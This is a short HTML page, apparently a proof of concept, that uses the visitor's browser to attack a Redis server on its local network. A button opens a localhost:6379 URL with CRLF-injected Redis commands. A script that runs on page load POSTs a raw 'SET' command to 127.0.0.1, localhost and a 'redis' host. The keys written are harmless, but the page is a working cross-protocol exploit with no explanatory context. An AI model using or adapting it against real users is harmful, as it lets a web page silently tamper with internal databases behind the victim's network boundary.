<html>
<head>
</head>
<body>

<button onclick="window.open('http://localhost:6379?abc=\r\nset abe 123\r\n', '', 'width=200,height=100')">click me</button>

<script type="application/javascript">
    ["http://127.0.0.1:6379", "http://localhost:6379", "http://redis:6379"].forEach(function (url) {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", url);
        xhr.setRequestHeader("Content-Type", "text/plain");
        xhr.overrideMimeType("text/plain");
        setTimeout(function () {
            xhr.send("SET abc 129\r\n");
        }, 3000);
    })
</script>

</body>
</html>

